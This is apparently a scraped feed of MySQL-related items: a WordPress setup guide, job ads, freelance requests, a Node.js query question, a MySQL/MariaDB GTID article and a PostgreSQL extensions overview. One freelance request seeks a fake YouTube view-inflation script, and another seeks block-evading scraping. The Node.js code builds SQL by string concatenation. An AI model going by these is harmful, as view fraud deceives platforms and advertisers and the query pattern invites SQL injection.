The majority of hosts provide cPanel - a popular website management facility. You can create your database, upload WordPress and install manually. For full instructions, refer to How to Create WordPress MySQL Databases on cPanel.

Fortunately, there is an easier option. Search or browse for the WordPress options in cPanel:

Install WordPress via cPanel

Click the WordPress Installer to open the installation panel:

WordPress installation options

Define the following settings:

  • https:// for the protocol if you enabled SSL in step 5. (You can also choose whether the domain uses the initial 'www' or not).
  • Your primary domain. (There will only be one choice unless you have multiple domains pointed at the hosting plan).
  • The directory should be left blank to install WordPress in the root folder. Only change this if you want to run it from another folder, e.g. https://mysite.com/blog/
  • The name and description of your new site.
  • Keep Multisite unchecked unless you're intending to run more than one WordPress site on the same space.
  • Enter an Admin Username and Password. You will use these to log into WordPress so ensure they're strong (NOT 'admin' and 'password'!) and you keep them in a safe place.
  • Enter your Email. WordPress uses this to send you notifications when necessary.

The other options can normally be left as the default settings. Hit Install and wait a few minutes for the installation process to complete. You will be given a link to the main site (https://mysite.com/) and the WordPress control panel (https://mysite.com/wp-admin) where you can log in with your administrative username and password.

Step 7: Initial WordPress Configuration

Don't be tempted to start publishing content just yet! It's best to configure WordPress from the Settings menu before going further:

WordPress settings

The following sections describe the basic WordPress settings but note that installed themes and plugins can override these options.

General

This pane allows you to change various aspects about your installation. The primary settings to change include:

  • The Timezone. This may default to UTC so choose an appropriate city instead.
  • The Date Format. Choose an appropriate option or enter a custom string using PHP's date format
  • The Time Format. Similarly, choose an option or enter your own.

Remember to hit Save Changes once finished.

Writing

The main settings to change in this pane are:

  • The Default Post Category. Post categories are defined in Posts > Categories.
  • The Default Post Format. WordPress themes often provide different post types such as standard articles, galleries and video pages. Choose whichever you will use most often.

Reading

The Front page displays setting allows you to set whether your latest posts or a static page is presented on the home page.

The other default settings are normally fine, although you may want to temporarily disable Search Engine Visibility during the initial stages of building your site. Don't forget to enable it before going live!

Discussion

This pane controls commenting. The main setting is Allow people to post comments on new articles which you may want to disable if you don't require comments.

The post The Ultimate Beginner’s Guide to Setting Up & Running a WordPress Site appeared first on SitePoint.


          change my website      Cache   Translate Page      
hello, i need my site to be changed so that it is a .php file, also need a settings file that allows me to change the name of the company, the address, the phone number, the email address and also the... (Budget: $30 - $250 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Need a Php Developer      Cache   Translate Page      
I need a php developer with skills who can start asap and finish the work in few minutes, I just need to remove social icons from pages. One more thing, You will have to work on my system using teamviewr, if you cannot work on these conditions, do not contact me or place bids... (Budget: ₹600 - ₹1000 INR, Jobs: CSS, HTML, MySQL, PHP, Website Design)
          Systems Engineer - Ameriinfo, Inc. - Martinsburg, WV      Cache   Translate Page      
Databases (Microsoft SQL, MySQL, Postgres, MongoDB, etc.). Please see the job details below and let me know if you would be interested in this role....
From Indeed - Thu, 04 Oct 2018 21:41:44 GMT - View all Martinsburg, WV jobs
          Virtualization - Hyper-V and VMWare Engineer - Rekruiters - Martinsburg, WV      Cache   Translate Page      
O Databases (Microsoft SQL, MySQL, Postgres, MongoDB, etc.). Systems Engineer provides technical support in system architecture, system design, system...
From Rekruiters - Tue, 09 Oct 2018 00:36:32 GMT - View all Martinsburg, WV jobs
          VueJs-Mid Level Developer - Core10 - Huntington, WV      Cache   Translate Page      
Experience with other database technologies (postgresql, mysql, mssql, mongodb). The Mid Developer is responsible for working as part of a collaborative...
From Core10 - Wed, 29 Aug 2018 19:17:59 GMT - View all Huntington, WV jobs
          NodeJs-Mid Level Developer - Core10 - Huntington, WV      Cache   Translate Page      
Experience with other database technologies (postgresql, mysql, mssql, mongodb). The Mid Developer is responsible for working as part of a collaborative...
From Core10 - Wed, 29 Aug 2018 19:17:59 GMT - View all Huntington, WV jobs
          Sr Database Administrator - KOHLS - Menomonee Falls, WI      Cache   Translate Page      
Golden Gate MySql 5.7 MongoDB. Sr Database Administrator POSITION OBJECTIVE Plans and executes the design, development, implementation, integration and support...
From Kohl's - Thu, 04 Oct 2018 23:09:17 GMT - View all Menomonee Falls, WI jobs
          Summer Intern Developers - Back End - Avid Ratings - Madison, WI      Cache   Translate Page      
MySQL, MongoDB, Cassandra, Redis, etc…). The right candidate should cherish experimentation and exploration with new technologies, while at the same time...
From Avid Ratings - Fri, 05 Oct 2018 00:14:43 GMT - View all Madison, WI jobs
          Java Developer - Fetch Rewards - Madison, WI      Cache   Translate Page      
Working with MongoDB and MySQL (or other relational database). _Fetch is a Madison, Wisconsin-based technology company located in the heart of downtown Madison....
From Indeed - Mon, 24 Sep 2018 18:47:45 GMT - View all Madison, WI jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Access multiple tables at once Mysql Nodejs      Cache   Translate Page      

I am trying to assing a structured array from two tables, First table select query from which the value in result fetch the ID and assing to the next query, Here is my code

var query = db.query('select * from orderdish'), users = []; query .on('error', function(err) { console.log(err); updateSockets(err); }) .on('result', function(order,callback) { order.abc ='11'; order.OrderKOT=[]; var queryOrderKOT = db.query('select * from tblorderkot where order_Id='+ order.order_Id,function() { kotOrders = []; queryOrderKOT .on('error',function(err) { console.log(err); updateSocket(err); }) .on('result',function(orderKOT) { kotOrders.push(orderKOT); }) .on('end', function() { console.log(kotOrders); order.OrderKOT.push(kotOrders); }); }); console.log(order); users.push(order); /* aa(function(){ });*/ }) .on('end', function() { // loop on itself only if there are sockets still connected if (connectionsArray.length) { pollingTimer = setTimeout(pollingLoop, POLLING_INTERVAL); console.log("This is End Values"); updateSockets({ users: users }); } });

It's setting order.OrderKOT to empty. I know the it got to be done with call back in query.on(result) but if I set it's not fetching me any result. Second Query queryOrderKOT is working but it's fetching value pretty late and it's not pusing value to order.OrderKOT . Suggesst me for fetching the value concurrently.

It is likely that the "end" event for the first query is occurring before the second queryOrderKot query has had a chance to complete.

You should experience the expected behavior if you move the main response logic from the "end" of query to the "end" or "result" of queryOrderKot .


          databases/courier-authlib-mysql - 0.69.0      Cache   Translate Page      
- Update devel/courier-unicode to 2.1 - Convert to USES localbase - Update mail/cone to 1.0 [1] - Update mail/courier-imap to 5.0.0 - Add LICENSE - Update mail/maildrop to 3.0.0 - Remove IDN option since it's now mandatory - Update mail/sqwebmail to 6.0.0 [2] - Update security/courier-authlib to 0.69.0 - Add note to UPDATING - Silence some portlint warnings PR: 231471 [1] Submitted by: me Approved by: Maintainer timeout [1], oliver@ [2] Differential Revision: https://reviews.freebsd.org/D17234
          odoo item import      Cache   Translate Page      
I have a lot of items that i need to import into odoo erp, they are roughly about 1,5000 items with the following variants Brand: Size: Bolt Pattern: Offset: B/S: Finish: Center Bore: Load Rating: Lip... (Budget: $30 - $250 USD, Jobs: ERP, MySQL, PostgreSQL, Python, Software Architecture)
          Free PBX hotel PMS intergration      Cache   Translate Page      
We are looking for a person that can write some scripts to integrate our Free PBX server to integrate with a hotel property Management system. (Budget: $250 - $750 USD, Jobs: Asterisk PBX, MySQL, PHP, Software Architecture, VoIP)
          HealthWalk(헬스워크) - 박상철 (팀노바 응용2단계작품)      Cache   Translate Page      
<작품 이름> HealthWalk(헬스워크) <작품 설명> 헬스장 위치 정보 제공 및 만보기 기능이 있는 서비스 <사용 기술> • Language: Java, PHP • OS: Android, Linux(Ubutu) • Web Server : Apache • Database : MySQL • Protocol : HTTP, TCP • API : 다음지도api • Library gson, tedpermission, circleimageview, picasso, glide, volley, okhttp, slidinguppanel, crop, stetho, firebase-core, firebase-messaging, eazegraph, MPAndroidChart <기능> - 회원 가입 및 로그인, 프로필 설정 • 회원가입할때 기업회원과 일반회원으로 나누어서 가입 • 기업회원은 본인의 헬스장을 등록하여 홍보 할 수 있음 - 걸.......
          Free PBX hotel PMS intergration      Cache   Translate Page      
We are looking for a person that can write some scripts to integrate our Free PBX server to integrate with a hotel property Management system. (Budget: $250 - $750 USD, Jobs: Asterisk PBX, MySQL, PHP, Software Architecture, VoIP)
          Technical Architect (Salesforce experience required) Casper - Silverline Jobs - Casper, WY      Cache   Translate Page      
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. BA/BS in Computer Science, Mathematics, Engineering, or similar technical degree or...
From Silverline Jobs - Sat, 23 Jun 2018 06:15:28 GMT - View all Casper, WY jobs
          Software Build Engineer - Leidos - Cheyenne, WY      Cache   Translate Page      
G., Oracle, MySQL, PostgreSQL, SQL Server, etc.). Our Company is a science and technology solutions leader built on a legacy of daring innovation and...
From Leidos - Thu, 27 Sep 2018 17:32:16 GMT - View all Cheyenne, WY jobs
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with MySQL, Microsoft SQL Server, and Oracle databases. Interface with stakeholders and end users to clarify requirements and complete software...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          Need a HR YT Views script . Script can be made in javascript or php . ( I must be able to put it on a website of mine where I have traffic ) . Script has to work like the example below.      Cache   Translate Page      
Example of a script that used to work but not working now: [url removed, login to view] Must be able to deliver even 1 mil views in a day . Traffic source can be Suggested Videos or Facebook, Reddit ... (Budget: $30 - $250 USD, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          MySQL GTID vs MariaDB GTID      Cache   Translate Page      

mysql supports three types for binlog format. For safer binlog based replication its recommended to use ROW based replication. But even though in some worst cases this leads to data inconsistency. Later MySQL came up with the concept of GTID (global transaction identifiers) which generates the unique binlog entries to avoid any data inconsistency. This feature supports in MySQL 5.6+. Percona MySQL Servers is also using the same structure of MySQL’s GTID. But MariaDB GTID is bit different.


MySQL GTID vs MariaDB GTID

As a DBA, I worked a lot in MySQL replication and troubleshooting but not much with GTID. I got stuck with a migration because of this GTID. Then I have confirmed the possibilities with one my Friend from mydbops . Then I started to understand deeply about this GTID in MySQL and MariaDB. After that I taught it worth to share.

What is the Purpose of GTID?

GTID will generate a globally unique transaction ID for each transaction. Lets see a simple example. You are going to replicate a Database from Server M to Server S. You have been set the Master binlog as binlog-00001 and its position as 120. Somehow after the binlog position 150, the replication got break, so by mistake you have mentioned to start replication from 120. This will re-apply all the transactions from binlog position 120. This may lead to duplicate records.

But GTID has an unique ID for each transaction, If you start replication with the GTID XXX:120 then the slave will start keep track on the applied GTID. So again if we start to re-apply the transaction, it’ll not accept those records.

GTID in MySQL:

In MySQL, there are two portions for GTID. The first portion refers to the Server UUID. This UUID is a 32 Character Random string. This value is taken from the auto.cnf file which is located in mysql data directory. The second portion is for sequence.

Example:

2defbe5b-a6b7-11e8-8882-42010a8e0008:10

If you have a single master, then in slave the GTID has represented as single expression.

Example:

2defbe5b-a6b7-11e8-8882-42010a8e0008:1-10

This refers that the transaction 1 to 10 has been originated from the Server which has the UUID as2defbe5b-a6b7-11e8-8882-42010a8e0008.

Lets to some tests:

Prepare a database with a table.

mysql -u root -ppass create database sqladmin; use sqladmin create table binlog (number int); mysql> insert into binlog values (1); Query OK, 1 row affected (0.03 sec) mysql> insert into binlog values (2); Query OK, 1 row affected (0.01 sec) mysql> insert into binlog values (3); Query OK, 1 row affected (0.02 sec)

Now open your binlog file with the following command.

mysqlbinlog mysql-bin-00001 --base64-output=DECODE-ROWS --verbose #180823 15:39:43 server id 1111 end_log_pos 124 CRC32 0x0d3ba090 Start: binlog v 4, server v 8.0.12 created 180823 15:39:43 at startup SET @@SESSION.GTID_NEXT= '2defbe5b-a6b7-11e8-8882-42010a8e0008:8'/*!*/; #180823 15:40:14 server id 1111 end_log_pos 349 CRC32 0x3d311ee1 Query thread_id=8 exec_time=0 error_code=0 BEGIN #180823 15:40:14 server id 1111 end_log_pos 445 CRC32 0xf547477c Write_rows: table id 66 flags: STMT_END_F ### INSERT INTO `sqladmin`.`binlog` ### SET ### @1=1 # at 445 #180823 15:40:14 server id 1111 end_log_pos 476 CRC32 0x2fb15a52 Xid = 9 COMMIT/*!*/; SET @@SESSION.GTID_NEXT= '2defbe5b-a6b7-11e8-8882-42010a8e0008:9'/*!*/; #180823 15:40:17 server id 1111 end_log_pos 630 CRC32 0x26771dff Query thread_id=8 exec_time=0 error_code=0 BEGIN #180823 15:40:17 server id 1111 end_log_pos 726 CRC32 0x7b5b1883 Write_rows: table id 66 flags: STMT_END_F ### INSERT INTO `sqladmin`.`binlog` ### SET ### @1=2 # at 726 #180823 15:40:17 server id 1111 end_log_pos 757 CRC32 0x8d0cdb14 Xid = 10 COMMIT/*!*/; SET @@SESSION.GTID_NEXT= '2defbe5b-a6b7-11e8-8882-42010a8e0008:10'/*!*/; #180823 15:40:19 server id 1111 end_log_pos 911 CRC32 0x3c7ef0dc Query thread_id=8 exec_time=0 error_code=0 BEGIN #180823 15:40:19 server id 1111 end_log_pos 1007 CRC32 0xbd02976b Write_rows: table id 66 flags: STMT_END_F ### INSERT INTO `sqladmin`.`binlog` ### SET ### @1=3 # at 1007 #180823 15:40:19 server id 1111 end_log_pos 1038 CRC32 0x1a7f559f Xid = 11 COMMIT/*!*/; #180823 15:40:40 server id 1111 end_log_pos 1113 CRC32 0xbd91558b GTID last_committed=3 sequence_number=4 rbr_only=yes original_committed_timestamp=1535038840931969 immediate_commit_timestamp=1535038840931969 transaction_length=473 SET @@SESSION.GTID_NEXT= '2defbe5b-a6b7-11e8-8882-42010a8e0008:11'/*!*/; #180823 15:40:29 server id 1111 end_log_pos 1192 CRC32 0x66184d4c Query thread_id=8 exec_time=0 error_code=0 BEGIN #180823 15:40:29 server id 1111 end_log_pos 1248 CRC32 0x3ecc40d8 Table_map: `sqladmin`.`binlog` mapped to number 66 #180823 15:40:29 server id 1111 end_log_pos 1288 CRC32 0x91460ce6 Write_rows: table id 66 flags: STMT_END_F ### INSERT INTO `sqladmin`.`binlog` ### SET ### @1=4 ### INSERT INTO `sqladmin`.`binlog` ### SET ### @1=5 ### INSERT INTO `sqladmin`.`binlog` ### SET ### @1=6 #180823 15:40:40 server id 1111 end_log_pos 1511 CRC32 0x8f1c4a0a Xid = 13 COMMIT/*!*/; SET @@SESSION.GTID_NEXT= 'AUTOMATIC' /* added by mysqlbinlog */ /*!*/; DELIMITER ; # End of log file /*!50003 SET COMPLETION_TYPE=@OLD_COMPLETION_TYPE*/; /*!50530 SET @@SESSION.PSEUDO_SLAVE_MODE=0*/;
MySQL GTID vs MariaDB GTID
Limitations: If you are using Mysql 5.6, then you must need to restart to enable the GTID. Mysql 5.7 we can do that in online. If you are using replication without GTID, then you need to enable the GTID on the Master, then Slave. On Master and Slave, you should have different UUID in the auto.cnf GTID in MariaDB

Unlike MySQL, MariaDB has implemented a new type of GTID, it has 3 portions. We don’t want to restart the to enable GTID in MariaDB.


MySQL GTID vs MariaDB GTID
Source: MariaDB Domain ID:

If you are using multi-master replication, lets say 3 node setup. The each group commit order should be ordered in the binlog on other servera. You are inserting the 3 records on each node. Due to some network issues, the Node 3 has disconnected, mean while Node 2 executed the drop table command and some sessions are inserting some data on the Node 3. When the network issue is resolved then the Node 3 will lose its track that where it should replicate the data and which node’s data should be applied first. This Domain ID will solve this. So the slave has to know where to start the transaction for Node 1 and Node 2.

Server ID:

This is the mysql’s parameter server-id. This is its second portionwhere the event group is first logged into the binlog.

Sequence:

This is same as MySQL’s sequence order.

Testing with MariaDB: mysql -u root -ppass create database sqladmin_mariadb; use sqladmin_mariadb; create table binlog_mariadb (number int); MariaDB [sqladmin_mariadb]> insert into binlog_mariadb values (1); Query OK, 1 row affected (0.004 sec) MariaDB [sqladmin_mariadb]> insert into binlog_mariadb values (2); Query OK, 1 row affected (0.003 sec) MariaDB [sqladmin_mariadb]> insert into binlog_mariadb values (3); Query OK, 1 row affected (0.003 sec) MariaDB [sqladmin_mariadb]> start transaction; Query OK, 0 rows affected (0.000 sec) MariaDB [sqladmin_mariadb]> insert into binlog_mariadb values (4); Query OK, 1 row affected (0.
          Una ayuda, please      Cache   Translate Page      
Estoy intentando pasar un tutorial de mysql a mysqli, pero me está dando problemas una función. El programa divide la pantalla en 2: en la parte...
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Tax Department API Link with POS System      Cache   Translate Page      
We have new regulations in Costa Rica that require transaction data to be sent to the Tax Department and the Customer Simultaneously (If the customer opts in to receive a digital receipt) within 3 hours of the transaction taking place... (Budget: $250 - $750 USD, Jobs: MySQL, PHP, Software Architecture, SQL, XML)
          Reply To: Copying a site without access to the MySQL export      Cache   Translate Page      

<< Error establishing a database connection <<

One of the DB parameters in your wp-config.php file is incorect.


          PHP - Module Lead - Mphasis - Bengaluru, Karnataka      Cache   Translate Page      
Total 6 – 8 years related experience in IT • Professional experience in PHP/MySQL (LAMP) stack development – 5 years ( 7 for senior) • Professional experience...
From Mphasis - Thu, 27 Sep 2018 12:28:53 GMT - View all Bengaluru, Karnataka jobs
          Scrape Website Data      Cache   Translate Page      
I need data scraped from a website and deposited into a mysql database. I can be flexible with the the programming language for scraping... I need to make sure that the website cannot block the server from scraping the data, so we may need to setup proxies and different things to protect from that... (Budget: $10 - $30 USD, Jobs: MySQL, PHP, Python, Software Architecture, Web Scraping)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Desarrollador Web - PCA Ingenieria - Palmira, Valle del Cauca      Cache   Translate Page      
Se busca desarrollador web, experiencia trabajando con PHP, MySQL, CSS y Javascript. Ideal que haya trabajado con algún framework PHP, XML, json, API REST....
De PCA Ingenieria - Sat, 22 Sep 2018 16:32:33 GMT - Ver todos: empleos en Palmira, Valle del Cauca
          Introducing our step-by-step guide on how to import your website to WordPress      Cache   Translate Page      
We just published a full-length tutorial on How to Migrate from Custom Database Design into WordPress. If you’ve built sites that have custom PHP and MySQL tables, this guide will teach you how to convert them into a WordPress site. Migrating from custom database tables is a complex task. Our guide talks you through it, […]
          Avinash Kumar: PostgreSQL Extensions for an Enterprise-Grade System      Cache   Translate Page      
PostgreSQL extensions for logging

PostgreSQL® logoIn this current series of blog posts we have been discussing various relevant aspects when building an enterprise-grade PostgreSQL setup, such as security, back up strategy, high availability, and different methods to scale PostgreSQL. In this blog post, we’ll get to review some of the most popular open source extensions for PostgreSQL, used to expand its capabilities and address specific needs. We’ll cover some of them during a demo in our upcoming webinar on October 10.

Expanding with PostgreSQL Extensions

PostgreSQL is one of the world’s most feature-rich and advanced open source RDBMSs. Its features are not just limited to those released by the community through major/minor releases. There are hundreds of additional features developed using the extensions capabilities in PostgreSQL, which can cater to needs of specific users. Some of these extensions are very popular and useful to build an enterprise-grade PostgreSQL environment. We previously blogged about a couple of FDW extensions (mysql_fdw and postgres_fdw ) which will allow PostgreSQL databases to talk to remote homogeneous/heterogeneous databases like PostgreSQL and MySQL, MongoDB, etc. We will now cover a few other additional extensions that can expand your PostgreSQL server capabilities.

pg_stat_statements

The pg_stat_statements module provides a means for tracking execution statistics of all SQL statements executed by a server. The statistics gathered by the module are made available via a view named pg_stat_statements. This extension must be installed in each of the databases you want to track, and like many of the extensions in this list, it is available in the contrib package from the PostgreSQL PGDG repository.

pg_repack

Tables in PostgreSQL may end up with fragmentation and bloat due to the specific MVCC implementation in PostgreSQL, or simply due to a high number of rows being naturally removed. This could lead to not only unused space being held inside the table but also to sub-optimal execution of SQL statements. pg_repack is the most popular way to address this problem by reorganizing and repacking the table. It can reorganize the table’s content without placing an exclusive lock on it during the process. DMLs and queries can continue while repacking is happening.  Version 1.2 of pg_repack introduces further new features of parallel index builds, and the ability to rebuild just the indexes. Please refer to the official documentation for more details.

pgaudit

PostgreSQL has a basic statement logging feature. It can be implemented using the standard logging facility with

log_statement = all
 . But this is not sufficient for many audit requirements. One of the essential features for enterprise deployments is the capability for fine-grained auditing the user interactions/statements issued to the database. This is a major compliance requirement for many security standards. The pgaudit extension caters to these requirements.

The PostgreSQL Audit Extension (pgaudit) provides detailed session and/or object audit logging via the standard PostgreSQL logging facility. Please refer to the settings section of its official documentation for more details.

pldebugger

This is a must-have extension for developers who work on stored functions written in PL/pgSQL. This extension is well integrated with GUI tools like pgadmin, which allows developers to step through their code and debug it. Packages for pldebugger are also available in the PGDG repository and installation is straightforward.Once it is set up, we can step though and debug the code remotely.

The official git repo is available here

plprofiler

This is a wonderful extension for finding out where the code is slowing down. This is very helpful, particularly during complex migrations from proprietary databases, like from Oracle to PostgreSQL, which affect application performance. This extension can prepare a report on the overall execution time and tables representation, including flamegraphs, with clear information about each line of code. This extension is not, however, available from the PGDG repo: you will need to build it from source. Details on building and installing plprofiler will be covered in a future blog post. Meanwhile, the official repository and documentation is available here

PostGIS

PostGIS is arguably the most versatile implementation of the specifications of the Open Geospatial Consortium. We can see a large list of features in PostGIS that are rarely available in any other RDBMSs.

There are many users who have primarily opted to use PostgreSQL because of the features supported by PostGIS. In fact, all these features are not implemented as a single extension, but are instead delivered by a collection of extensions. This makes PostGIS one of the most complex extensions to build from source. Luckily, everything is available from the PGDG repository:

$ sudo yum install postgis24_10.x86_64

Once the postgis package is installed, we are able to create the extensions on our target database:

postgres=# CREATE EXTENSION postgis;
CREATE EXTENSION
postgres=# CREATE EXTENSION postgis_topology;
CREATE EXTENSION
postgres=# CREATE EXTENSION postgis_sfcgal;
CREATE EXTENSION
postgres=# CREATE EXTENSION fuzzystrmatch;
CREATE EXTENSION
postgres=# CREATE EXTENSION postgis_tiger_geocoder;
CREATE EXTENSION
postgres=# CREATE EXTENSION address_standardizer;
CREATE EXTENSION

Language Extensions : PL/Python, PL/Perl, PL/V8,PL/R etc.

Another powerful feature of PostgreSQL is its programming languages support. You can code database functions/procedures in pretty much every popular language.

Thanks to the enormous number of libraries available, which includes machine learning ones, and its vibrant community, Python has claimed the third spot amongst the most popular languages of choice according to the TIOBE Programming index. Your team’s skills and libraries remain valid for PostgreSQL server coding too! Teams that regularly code in JavaScript for Node.js or Angular can easily write PostgreSQL server code in PL/V8. All of the packages required are readily available from the PGDG repository.

cstore_fdw

cstore_fdw is an open source columnar store extension for PostgreSQL. Columnar stores provide notable benefits for analytics use cases where data is loaded in batches. Cstore_fdw’s columnar nature delivers performance by only reading relevant data from disk. It may compress data by 6 to 10 times to reduce space requirements for data archive. The official repository and documentation is available here

HypoPG

HypoPG is an extension for adding support for hypothetical indexes – that is, without actually adding the index. This helps us to answer questions such as “how will the execution plan change if there is an index on column X?”. Installation and setup instructions are part of its official documentation

mongo_fdw

Mongo_fdw presents collections from mongodb as tables in PostgreSQL. This is a case where the NoSQL world meets the SQL world and features combine. We will be covering this extension in a future blog post. The official repository is available here

tds_fdw

Another important FDW (foreign data wrapper) extension in the PostgreSQL world is tds_fdw. Both Microsoft SQL Server and Sybase uses TDS (Tabular Data Stream) format. This fdw allows PostgreSQL to use tables stored in remote SQL Server or Sybase database as local tables. This FDW make use of FreeTDS libraries.

orafce

As previously mentioned, there are lot of migrations underway from Oracle to PostgreSQL. Incompatible functions in PostgreSQL are often painful for those who are migrating server code. The “orafce” project implements some of the functions from the Oracle database. The functionality was verified on Oracle 10g and the module is useful for production work. Please refer to the list in its official documentation about the Oracle functions implemented in PostgreSQL

TimescaleDB

In this new world of IOT and connected devices, there is a growing need of time-series data. Timescale can convert PostgreSQL into a scalable time-series data store. The official site is available here with all relevant links.

pg_bulkload

Is loading a large volume of data into database in a very efficient and faster way a challenge for you? If so pg_bulkload may help you solve that problem. Official documentation is available here

pg_partman

PostgreSQL 10 introduced declarative partitions. But creating new partitions and maintaining existing ones, including purging unwanted partitions, requires a good dose of manual effort. If you are looking to automate part of this maintenance you should have a look at what pg_partman offers. The repository with documentation is available here.

wal2json

PostgreSQL has feature related to logical replication built-in. Extra information is recorded in WALs which will facilitate logical decoding. wal2json is a popular output plugin for logical decoding. This can be utilized for different purposes including change data capture. In addition to wal2json, there are other output plugins: a concise list is available in the PostgreSQL wiki.

There are many more extensions that help us build an enterprise-grade PostgreSQL set up using open source solutions. Please feel free to comment and ask us if we know about one that satisfies your particular needs. Or, if there’s still time, sign up for our October webinar and ask us in person!

The post PostgreSQL Extensions for an Enterprise-Grade System appeared first on Percona Database Performance Blog.


          AMTRON Recruitment 2018 18 Systems Assistant Posts       Cache   Translate Page      
AMTRON Recruitment 2018 2019 | AMTRON invites Online Application for the post of 18 Systems Officer, Systems Assistant Posts. AMTRON Systems Officer, Systems Assistant Jobs Notification 2018 Released. AMTRON invites on-line applications for appointment in following Systems Officer, Systems Assistant post in Assam Electronics Development Corporation Ltd. Opening Date and time for Submission of Application is 09.10.2018 and end up by 23.10.2018. You can check here AMTRON Recruitment Eligibility Criteria, Pay Scale, Application Fee/Exam Fee, AMTRON Selection Process, How to apply, AMTRON Syllabus, AMTRON Question Paper, AMTRON Admit Date Release Date, AMTRON Exam Date, AMTRON Result Release Date & other rules are given below... Aspirants are requested to go through the latest AMTRON job recruitment 2018 fully, before applying to this job.

AMTRON Recruitment 2018 Notification Highlights:
Organization Name:
Assam Electronics Development Corporation Ltd
Job Category:
Assam Govt Jobs
No. of Posts:
18 Vacancies
Name of the Posts:
Systems Officer, Systems Assistant & Various Posts
Job Location:
Assam
Selection Procedure:
Written Exam, Interview
Application Apply Mode:
Online
Official Website:
www.amtron.in
Starting Date:
09.10.2018
Last Date:
23.10.2018

AMTRON Recruitment 2018 Vacancy Details:
Name of the Post & No of Vacancies:
AMTRON Invites Applications for the Following Posts
SI No
Name of Post
No. of Post
1
Systems Officer, Systems Assistant
18
Total
18

Eligibility Criteria for AMTRON Systems Officer, Systems Assistant:
As per the recent AMTRON notification 2018, the eligibility details like Educational Qualification & Age Limit for the Systems Officer, Systems Assistant job has given below.
Educational Qualification:
SI No
Name of Post
Qualification
1.
Systems Officer
BE or B.Tech (Computer Science/ Information Technology/ Electronics & Communication /Electronics & Telecommunication / Electronics & Instrumentation/ Electronics & Electricals/Telecommunication/ Instrumentation) or MCA or MSc(Computer Science/Information Technology/ Electronics & Communication /Electronics & Telecommunication / Electronics & Instrumentation/ Electronics & Electricals/Telecommunication/ Instrumentation) + 1 Year experience in software development in PHP/Java and Postgresql/MySQL environment, Android and IOS Mobile App development, Technical Troubleshooting & support in Hardware/Software implementation.
2.
Systems Assistant
B.C.A or B.Sc. (Physics/Mathematics) with 1 year Post Graduate Diploma in Computer Science / Applications or DOECC `A` Level or Diploma holders (3 years) from Polytechnic in Computer Science/Engineering + Knowledge in Server Administration/LAN/ DBA/Technical troubleshooting support in Hardware.

Age Limit:
Name of Post
Age Limit
For Gen/ UR Candidates
28 Years
The Upper age limit is relaxed by 5 years for SC/ST; 3 years for OBC, 10 Years for Persons with Disabilities (15 years for SC/ST PWD’s & 13 years for OBC PWD’s) and for Ex-S as per Govt. of India rules. Candidates Relaxation in Upper Age limit will be provided as per Govt. Rules. Go through AMTRON official Notification 2018 for more reference

Salary Details:
SI No
Name of Post
Pay scale
01
Systems Officer
Monthly fixed pay: Rs. 15985.00 EPF Contributions per month: Rs. 3600.00
02
Systems Assistant
Monthly fixed pay: Rs. 10750.00 EPF Contributions per month: Rs. 2580.00


AMTRON Systems Officer, Systems Assistant Selection Procedure:
AMTRON may follow the following process to select the candidates.
1.
Written Exam
2.
Interview
How to apply AMTRON Systems Officer, Systems Assistant Vacancy?  
Candidates satisfying the above eligibility conditions Use Following Procedure Given Below to Apply Online:
Step 1: Log on to AMTRON Careers Page at official website to www.amtron.in
Step 2: Eligible candidates are advised to open Notification
Step 3: Read the Advertisement carefully to be sure about your eligibility
Step 4: Click on “Click here for New Registration”, if you are a new user.
Step 5: Fill your Academic Qualification & Other Related Information as per the instructions
Step 6: Ensure the information provided is correct
Step 7: Complete the Registration & Click on “Submit” & Make Payments
Step 8: Take a print out of online application for future use.
Important Dates to Remember: 
Important Dates
Starting Date for Submission of Application
09.10.2018
Last date for Submission of Application
23.10.2018
Date of Examination
Nov/Dec 2018

AMTRON Important Links:
Online Application & Official Notification Links:
AMTRON Official Website Career Page
AMTRON Official Notification PDF
AMTRON Online Application Form

Related Post:-




          very professional server administrator      Cache   Translate Page      
i am looking professional server administrator so bette that knows how to work well And answer problems quickly And knows Presta Shop And an expert at Prestashop who knows how to build models and fix ... (Budget: $10 - $300 USD, Jobs: HTML, MySQL, PHP, Prestashop)
          Install DVWA (Damn Vulnerable Web Application) in Kali Linux – Detailed Tutorial      Cache   Translate Page      

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn defenseless. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in […]

The post Install DVWA (Damn Vulnerable Web Application) in Kali Linux – Detailed Tutorial appeared first on Yeah Hub.

